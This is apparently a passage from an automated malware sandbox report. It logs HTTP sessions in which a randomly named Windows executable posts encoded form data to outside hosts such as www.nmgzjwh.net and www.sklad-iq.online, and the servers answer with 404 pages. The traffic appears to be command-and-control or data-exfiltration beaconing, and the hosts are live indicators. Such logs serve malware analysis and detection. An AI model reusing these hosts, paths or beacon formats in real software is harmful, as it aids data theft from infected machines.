                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 4a 43 36 53 33 72 39 63 30 66 53 50 44 49 30 54 36 33 68 6e 68 7a 4f 75 65 72 51 36 76 48 79 38 70 7a 47 39 43 6a 45 5a 41 37 71 63 6f 4e 5a 6a 62 57 5a 69 42 53 73 55 64 47 4b 70 2b 6e 4d 31 77 62 32 49 67 31 47 45 48 57 51 6f 58 30 77 39 78 41 6c 37 51 72 59 37 6b 78 34 64 36 41 53 44 65 45 47 57 53 31 71 34 46 44 55 63 6f 4e 58 4a 67 72 31 62 62 75 43 5a 54 74 30 34 51 46 4e 55 66 53 4d 71 77 57 69 76 68 6d 33 6a 52 34 38 46 42 61 74 4a 41 43 2f 7a 75 63 4c 77 45 4e 49 49 73 4d 54 45 48 4b 6d 54 72 75 59 4c 73 34 71 38 74 43 57 31 79 4c 37 49 77 6e 2b 76 61 55 47 59 30 77 30 39 32 2f 75 37 35 65 4c 36 52 4c 70 62 53 4b 63 4b 78 6e 55 3d
                                                                                      Data Ascii: 3vNdCBvX=JC6S3r9c0fSPDI0T63hnhzOuerQ6vHy8pzG9CjEZA7qcoNZjbWZiBSsUdGKp+nM1wb2Ig1GEHWQoX0w9xAl7QrY7kx4d6ASDeEGWS1q4FDUcoNXJgr1bbuCZTt04QFNUfSMqwWivhm3jR48FBatJAC/zucLwENIIsMTEHKmTruYLs4q8tCW1yL7Iwn+vaUGY0w092/u75eL6RLpbSKcKxnU=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      43192.168.2.450045172.67.168.228804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:47.202282906 CET10821OUTPOST /gb2h/ HTTP/1.1
                                                                                      Host: www.nmgzjwh.net
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.nmgzjwh.net
                                                                                      Referer: http://www.nmgzjwh.net/gb2h/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 4a 43 36 53 33 72 39 63 30 66 53 50 44 49 30 54 36 33 68 6e 68 7a 4f 75 65 72 51 36 76 48 79 38 70 7a 47 39 43 6a 45 5a 41 37 79 63 6f 39 46 6a 64 42 4e 69 43 53 73 55 42 32 4b 6b 2b 6e 4d 53 77 59 47 4d 67 31 4c 7a 48 55 6f 6f 56 57 34 39 32 78 6c 37 48 37 59 37 6f 52 34 63 6e 77 54 42 65 45 57 53 53 31 36 34 46 44 55 63 6f 50 50 4a 32 4f 42 62 5a 75 43 47 46 39 30 6b 55 46 4d 39 66 53 55 55 77 57 6d 56 68 57 58 6a 52 59 4d 46 43 73 42 4a 4e 43 2f 78 70 63 4b 31 45 4e 4d 44 73 4d 50 49 48 4b 44 2b 72 70 51 4c 39 66 48 66 39 32 4f 52 6a 64 58 6e 72 77 6e 4e 61 56 2b 39 78 78 67 69 35 2f 2b 47 6b 74 48 46 56 4c 77 77 57 36 4d 61 7a 51 5a 30 30 71 79 76 4e 2f 65 79 47 75 74 50 70 37 34 58 37 54 48 69 47 58 31 67 52 54 68 76 53 4c 42 53 74 71 59 42 55 45 64 79 30 2f 61 33 44 33 6b 32 74 4d 4c 36 69 74 6d 44 58 4a 69 6b 6b 2f 31 67 5a 63 31 66 47 46 74 6f 56 44 36 35 4e 7a 48 34 48 4e 6c 52 33 49 50 73 44 31 76 46 4f 58 69 4e 53 77 48 44 4b 6e 7a 74 35 77 38 2b 59 67 5a 2f 36 [TRUNCATED]
                                                                                      Data Ascii: 3vNdCBvX=JC6S3r9c0fSPDI0T63hnhzOuerQ6vHy8pzG9CjEZA7yco9FjdBNiCSsUB2Kk+nMSwYGMg1LzHUooVW492xl7H7Y7oR4cnwTBeEWSS164FDUcoPPJ2OBbZuCGF90kUFM9fSUUwWmVhWXjRYMFCsBJNC/xpcK1ENMDsMPIHKD+rpQL9fHf92ORjdXnrwnNaV+9xxgi5/+GktHFVLwwW6MazQZ00qyvN/eyGutPp74X7THiGX1gRThvSLBStqYBUEdy0/a3D3k2tML6itmDXJikk/1gZc1fGFtoVD65NzH4HNlR3IPsD1vFOXiNSwHDKnzt5w8+YgZ/6gIAcs5nqHSSQwr7A0NFXr+EM9tNO4EdRnUOMmHRvrPi4OxGl7IoCsuTAUIHxKkxKpzSkYYijVDW4e16XCsnGNs8M3Zc1b3xtu0aOqaI/5m8jScEAWwq/bSobJcw+8S+4hm/jr3YmhXysF7Rj4Lzub7w/kem2jWA8rsDg7tSxkJNQz13N2E9dBWNvEcRhJeIXi2Ib+CkA/SCs52gIKKbFQbGQ9H0d1TC0EQX9earjdtdqiwuva4rWmQt7Qcx68ME2YXFGFdjLD2F7OslVbHwlknqS4zAVZ6MuQhREOmpjOv42yok8tFU2deaMiDqySKgTV5ywgWxELSS3inqES8RouX/5rdRhDrZehzZ3rsta0tx+OJduWxbtw/Wt6KJKp9dlhGS+5THoKeGufHb6zz7IGghudfWbMMBCsiVjsEAuhU2EyE2OtMkCKqvdYf0sHGeUHxmztJpVh0FRdVSr8ZGmXXkm2XMYKrXqf76/k/0IIU4PwxnUrIHZad7GOUL8lHPbuajxFiYASFgYFa1tV+2jJY9m1UNryZQ42ctFkI+oMCD1NEbpTo0jgBzNb5sKK+f8VxNYEzCAT2A+LzpksA7KtbDlw/SGjEzWWVPJiWyMpO8R3Bmw1LXpBgHJhTmebcynxZOzePt92ddiPv88g5JsTwRpJBBED/xfLr [TRUNCATED]
                                                                                      Nov 24, 2024 08:12:48.821084976 CET902INHTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:12:48 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OSb3x4YC0arQMdCNS%2FiImRi2s5C%2Bo%2FFpK8h%2FlzNPerCzKbG1Q0gqwGQyaoyjBYvluIYtg%2Fd6k2FTINV%2Bz1hXANXAF8r0TkCXvI5ClYaRZh%2Bt2FkKjq%2FiBC5MIB3KMMPj%2BRE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e7797bcec31c43b-EWR
                                                                                      Content-Encoding: gzip
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1470&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10821&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 70 d9 24 e5 a7 54 da 71 d9 24 a7 e6 95 a4 16 d9 d9 64 18 a2 ab cf 30 b4 b3 d1 87 4a 73 d9 64 14 d9 c1 d4 e6 a5 67 e6 55 20 49 e9 43 8d d2 07 bb 01 00 ad 72 6b 8d 8a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 6d(HML),I310Q/Qp/Kp$Tq$d0JsdgU ICrk0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      44192.168.2.450046172.67.168.228804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:49.863296032 CET459OUTGET /gb2h/?3vNdCBvX=EASy0dFQ3+mIcpYj5hhEpzGwaoMP7Xj9wz6GDDYkBoOZntt4ETpAdTcmLSDA/l8Pq56TjzGqLUU3SQIDrjgXHLAts09AmDfBZWK+en/xOBIa/+jQwvZyXLY=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.nmgzjwh.net
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:12:51.492211103 CET888INHTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:12:51 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      cf-cache-status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WurFPj1JcJ1uFHk%2BFiD8RfeidKmi6k10MmkL4pZ033HGVq9QTaQWWSfHlkXEOUk4jA5zjvoHJgaar9hELacHOU8SxKPvQnyr2ItO0qmC0xxzbBoH1ATQugKDL5hNcNQeLQM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e7797cdaedc8c09-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1761&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=459&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 38 61 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 8a<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      45192.168.2.450047194.58.112.174804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:57.261665106 CET731OUTPOST /gdvz/ HTTP/1.1
                                                                                      Host: www.sklad-iq.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.sklad-iq.online
                                                                                      Referer: http://www.sklad-iq.online/gdvz/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 31 30 41 6a 54 74 36 33 45 69 66 42 7a 65 39 51 45 4f 4c 2f 38 45 50 70 36 49 59 6e 66 6e 6c 59 5a 6a 77 71 64 6a 79 75 34 70 4f 4c 31 67 6b 36 43 70 72 32 63 73 38 38 74 31 51 59 59 77 6e 4a 77 6c 78 48 76 45 5a 49 51 59 35 63 53 67 71 77 4d 66 43 35 5a 44 74 6e 75 34 69 70 41 6f 72 48 68 30 4b 64 70 72 4d 4c 42 34 4f 6b 6b 35 31 4a 62 79 41 78 39 6f 6c 71 34 6a 6b 67 6d 49 33 75 6f 31 6f 43 4f 79 6a 2b 4c 62 79 74 2b 71 37 70 59 58 57 68 43 78 2f 73 75 76 42 6c 6b 49 34 72 44 47 2b 77 4e 42 65 58 4c 65 47 43 6d 6f 71 74 6c 73 5a 6e 46 35 6f 4d 57 34 78 45 39 51 2b 49 6f 41 3d 3d
                                                                                      Data Ascii: 3vNdCBvX=10AjTt63EifBze9QEOL/8EPp6IYnfnlYZjwqdjyu4pOL1gk6Cpr2cs88t1QYYwnJwlxHvEZIQY5cSgqwMfC5ZDtnu4ipAorHh0KdprMLB4Okk51JbyAx9olq4jkgmI3uo1oCOyj+Lbyt+q7pYXWhCx/suvBlkI4rDG+wNBeXLeGCmoqtlsZnF5oMW4xE9Q+IoA==
                                                                                      Nov 24, 2024 08:12:58.667351961 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:12:58 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b [TRUNCATED]
                                                                                      Data Ascii: d1bZko_1fQRERMS(.P4mHI#F}CvQ].)R~)*@9;s{gf{-`C&eUqP:\Zh\A{'$gG{~i3sO*!F?0;)hlD9s0da'v[Kpm:DHG=Lx|hiGM|HJ,B`Opa$J7e`qf"P+M\02cuyz]zmuj`b-X-mXM+cX*}/bi^(`GvRNr3E"S8t4\Aok:NV`;:3Jd,Gut$rEK svW5@JR\D7Q(9Hd?%|>Qr7wnn4:l6P0`Y=A(|@-"y4t#(WL?Jo6-nZXGt@7&CQA,VvRnYlmdgX6fzhOh#RUnN9sUwR~.a@?|QG9Y6!-{;WE|_/F.y/u\"50pbk{Z4n`H'-ZoHKaSV_w)O^N/S{2%uks,\ecJ0c/W|l,;L~Q'3;`&GgMIt)KF*)RjC' "1yhW)"*B<(/&UaZ3;8 ,""6b [TRUNCATED]
                                                                                      Nov 24, 2024 08:12:58.667390108 CET1236INData Raw: 36 eb cc fd 25 76 75 0d 0f d1 ec f8 1d 57 f4 a5 a1 23 1b 13 ca 28 f0 07 4f 76 0a a8 18 70 b7 29 93 fd 13 e8 45 da 82 79 1f 27 f7 80 33 25 61 8e 65 17 63 57 1b 27 1e 77 b5 cb 0b 4d ba 01 f8 ce 43 a2 f4 05 e4 fe 19 e9 ef 7e fa 7b 84 c8 e3 f4 cb e4
                                                                                      Data Ascii: 6%vuW#(Ovp)Ey'3%aecW'wMC~{{VPK'i>3<5.;Hox:s+p|@XazP6Io^`,dPH?|XXC5d__z3LtCKx120x`j?sB~$!EU7Y
                                                                                      Nov 24, 2024 08:12:58.667402983 CET1069INData Raw: b6 7b 2d 5d 82 3c e5 35 c2 d2 81 a5 e3 fa 65 cf 4f 3a b2 cf ae 3d f2 4b 11 28 de e3 92 d7 e8 4f fd da 29 56 fa 71 fa ac c6 a8 dd 54 37 1d 38 e5 c4 b9 64 9d cd 77 a2 fe 91 c0 06 df df 98 1b bc 77 6a ee eb 4c 16 4e 49 3b 4e 6f a9 9c 5d 1e 31 3a 5b
                                                                                      Data Ascii: {-]<5eO:=K(O)VqT78dwwjLNI;No]1:[qi#l[k[cU^eH~A_`KLW9DJA56tue)wfTmN?bYV]1bq!,Z*}s9ghO)2rz*;w|{sK/}$dRrxH


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      46192.168.2.450048194.58.112.174804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:12:59.929430962 CET751OUTPOST /gdvz/ HTTP/1.1
                                                                                      Host: www.sklad-iq.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.sklad-iq.online
                                                                                      Referer: http://www.sklad-iq.online/gdvz/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 31 30 41 6a 54 74 36 33 45 69 66 42 31 50 4e 51 42 70 66 2f 36 6b 50 32 77 6f 59 6e 4b 58 6c 63 5a 6a 38 71 64 6d 53 41 35 61 36 4c 31 46 59 36 44 6f 72 32 66 73 38 38 6e 56 51 58 46 41 6e 53 77 6c 74 6c 76 46 6c 49 51 59 39 63 53 68 61 77 51 38 36 34 59 54 74 6c 37 49 69 72 50 49 72 48 68 30 4b 64 70 72 70 51 42 35 71 6b 6c 4a 6c 4a 61 57 55 79 30 49 6c 74 2f 6a 6b 67 77 49 33 69 6f 31 6f 77 4f 7a 50 59 4c 5a 36 74 2b 76 48 70 59 46 75 69 4e 78 2f 71 6a 50 41 52 6e 62 56 6c 4e 33 58 45 54 6a 43 71 56 66 4f 6a 6a 75 6e 33 30 64 34 77 58 35 4d 2f 4c 2f 34 77 77 54 44 42 7a 4a 6c 42 72 7a 50 32 52 72 43 76 6a 6d 53 4c 42 57 47 6c 7a 6b 73 3d
                                                                                      Data Ascii: 3vNdCBvX=10AjTt63EifB1PNQBpf/6kP2woYnKXlcZj8qdmSA5a6L1FY6Dor2fs88nVQXFAnSwltlvFlIQY9cShawQ864YTtl7IirPIrHh0KdprpQB5qklJlJaWUy0Ilt/jkgwI3io1owOzPYLZ6t+vHpYFuiNx/qjPARnbVlN3XETjCqVfOjjun30d4wX5M/L/4wwTDBzJlBrzP2RrCvjmSLBWGlzks=
                                                                                      Nov 24, 2024 08:13:01.334291935 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:13:01 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b [TRUNCATED]
                                                                                      Data Ascii: d1bZko_1fQRERMS(.P4mHI#F}CvQ].)R~)*@9;s{gf{-`C&eUqP:\Zh\A{'$gG{~i3sO*!F?0;)hlD9s0da'v[Kpm:DHG=Lx|hiGM|HJ,B`Opa$J7e`qf"P+M\02cuyz]zmuj`b-X-mXM+cX*}/bi^(`GvRNr3E"S8t4\Aok:NV`;:3Jd,Gut$rEK svW5@JR\D7Q(9Hd?%|>Qr7wnn4:l6P0`Y=A(|@-"y4t#(WL?Jo6-nZXGt@7&CQA,VvRnYlmdgX6fzhOh#RUnN9sUwR~.a@?|QG9Y6!-{;WE|_/F.y/u\"50pbk{Z4n`H'-ZoHKaSV_w)O^N/S{2%uks,\ecJ0c/W|l,;L~Q'3;`&GgMIt)KF*)RjC' "1yhW)"*B<(/&UaZ3;8 ,""6b [TRUNCATED]
                                                                                      Nov 24, 2024 08:13:01.334316969 CET1236INData Raw: 36 eb cc fd 25 76 75 0d 0f d1 ec f8 1d 57 f4 a5 a1 23 1b 13 ca 28 f0 07 4f 76 0a a8 18 70 b7 29 93 fd 13 e8 45 da 82 79 1f 27 f7 80 33 25 61 8e 65 17 63 57 1b 27 1e 77 b5 cb 0b 4d ba 01 f8 ce 43 a2 f4 05 e4 fe 19 e9 ef 7e fa 7b 84 c8 e3 f4 cb e4
                                                                                      Data Ascii: 6%vuW#(Ovp)Ey'3%aecW'wMC~{{VPK'i>3<5.;Hox:s+p|@XazP6Io^`,dPH?|XXC5d__z3LtCKx120x`j?sB~$!EU7Y
                                                                                      Nov 24, 2024 08:13:01.334328890 CET1069INData Raw: b6 7b 2d 5d 82 3c e5 35 c2 d2 81 a5 e3 fa 65 cf 4f 3a b2 cf ae 3d f2 4b 11 28 de e3 92 d7 e8 4f fd da 29 56 fa 71 fa ac c6 a8 dd 54 37 1d 38 e5 c4 b9 64 9d cd 77 a2 fe 91 c0 06 df df 98 1b bc 77 6a ee eb 4c 16 4e 49 3b 4e 6f a9 9c 5d 1e 31 3a 5b
                                                                                      Data Ascii: {-]<5eO:=K(O)VqT78dwwjLNI;No]1:[qi#l[k[cU^eH~A_`KLW9DJA56tue)wfTmN?bYV]1bq!,Z*}s9ghO)2rz*;w|{sK/}$dRrxH


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      47192.168.2.450049194.58.112.174804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:13:02.588238955 CET10833OUTPOST /gdvz/ HTTP/1.1
                                                                                      Host: www.sklad-iq.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.sklad-iq.online
                                                                                      Referer: http://www.sklad-iq.online/gdvz/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 31 30 41 6a 54 74 36 33 45 69 66 42 31 50 4e 51 42 70 66 2f 36 6b 50 32 77 6f 59 6e 4b 58 6c 63 5a 6a 38 71 64 6d 53 41 35 62 43 4c 31 58 67 36 4d 72 44 32 65 73 38 38 6b 56 51 55 46 41 6e 54 77 6c 31 68 76 46 70 59 51 61 31 63 64 6a 43 77 41 4e 36 34 52 54 74 6c 6b 59 69 71 41 6f 72 53 68 77 6e 61 70 72 35 51 42 35 71 6b 6c 4d 68 4a 64 43 41 79 34 6f 6c 71 34 6a 6b 38 6d 49 33 47 6f 31 77 67 4f 7a 4b 6a 4b 6f 61 74 77 76 33 70 5a 77 36 69 53 42 2f 6f 77 2f 41 4a 6e 62 5a 75 4e 33 4c 2b 54 69 32 45 56 66 4b 6a 75 5a 53 66 7a 2b 6b 51 55 71 59 44 63 2b 41 31 32 41 54 47 39 6f 4e 74 6a 78 58 50 45 5a 71 51 6c 45 54 59 57 6e 4b 7a 78 55 64 72 71 39 67 4f 76 47 2b 65 53 37 43 4b 50 4e 52 2b 57 31 7a 39 36 51 66 2b 4a 47 37 70 66 63 64 39 30 2f 55 78 65 47 53 44 6d 70 4c 68 44 6d 4a 6c 2f 48 5a 50 38 73 44 4d 54 6e 43 72 4c 6d 70 69 55 4f 41 63 57 64 66 5a 79 38 38 77 42 70 65 76 43 4e 4b 38 66 55 68 34 6a 6f 42 65 48 42 4d 44 4b 6e 36 51 49 65 77 46 66 48 64 61 68 5a 46 72 70 [TRUNCATED]
                                                                                      Data Ascii: 3vNdCBvX=10AjTt63EifB1PNQBpf/6kP2woYnKXlcZj8qdmSA5bCL1Xg6MrD2es88kVQUFAnTwl1hvFpYQa1cdjCwAN64RTtlkYiqAorShwnapr5QB5qklMhJdCAy4olq4jk8mI3Go1wgOzKjKoatwv3pZw6iSB/ow/AJnbZuN3L+Ti2EVfKjuZSfz+kQUqYDc+A12ATG9oNtjxXPEZqQlETYWnKzxUdrq9gOvG+eS7CKPNR+W1z96Qf+JG7pfcd90/UxeGSDmpLhDmJl/HZP8sDMTnCrLmpiUOAcWdfZy88wBpevCNK8fUh4joBeHBMDKn6QIewFfHdahZFrpBJOGf13b+oZp3NWKqStFr5QL3oBT1VQZucg9ZPfK+dEsw2xS+9iQ1zH+tSya2CU2ofcWWsTdgL65BI4BC5blcIsOnNTlmoZAT9fg11l0WYLR9Mxb2gXJiMlkc4vsLdus+5H1STRoqimvPCxsprWrlNvIIoED6oJU9jxx6Zo72vuJ6id9qqjEWasPnh9+6QPSESQNvghCHzTEH2fMEMz60NaMaY9Npn1OZgC8hg+335LzpIzSuxz9TSFgu1YS2bfzRtUcBi3WOVvo98CaguHQ76JtjIEpmiIxkWOGNhd4D1S2wi6Hi5LdSWgQzBeEo6tgEbNIUXd48sIk34xqYVvQKWNHDPv1s5nxNV+/XcNzYfQA+mSVwDMhKcIOujsLyBT1+8K9gby1XD93k5tDgZyGk2YKLb+M2+E2bjRqGlWtaIKNwj4ffZPFJPPGODhdpe5A5lQPBklp0dpQMbppTvmQ9ggmJUt2PULMrUfd/6FDCQQe+rw9+e91ZMim2rHLO5A6nQ6Av4xgGcGMOwRfDXJSGlJWnHwRn6q6JpyFK9gh711sNrtIB9HDEMs1rvI+lVv4CcVCzoQD29BUPR5RrUHcDEEJPsaLu9FSKnf3rVjsEv6ktIGyf+Y0nBT3GDejWhyT4eJ3YkUq2e88fRTeZgU8hhPHbVSpYIVnXj [TRUNCATED]
                                                                                      Nov 24, 2024 08:13:03.996877909 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:13:03 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip
